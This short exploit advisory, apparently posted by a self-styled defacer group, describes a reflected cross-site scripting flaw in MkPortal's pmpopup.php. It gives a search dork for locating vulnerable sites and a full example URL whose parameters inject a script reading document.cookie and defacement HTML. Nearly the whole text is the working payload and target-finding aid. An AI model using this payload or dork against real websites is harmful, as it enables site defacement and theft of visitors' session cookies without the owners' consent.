MkPortal Cross Site Scripting (All versions) xSS
#By: HanowarS
#mail: vannovax[at]gmail.com
#Greetz: Nettoxic, _Antrax_, Fr34k, SSH-2, xarnuz
#web: www.div.com.ve and www.c-group.org
#ALL VERSIONS!!
# Latin American Defacers
############################
Dork:
MKPortal M1.1 Rc1 ©2003-2005 All rights reserved
Hilo:
/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>
Affected File:
pmpopup.php
Example:
http://www.example.com/mkportal/include/pmpopup.php?u1=www.c-group.org&m1=<script>alert(document.cookie)</script>&m2=<h1>h4x0r3d</h1>&m3=by&m4=<h1>HANOWARS</h1>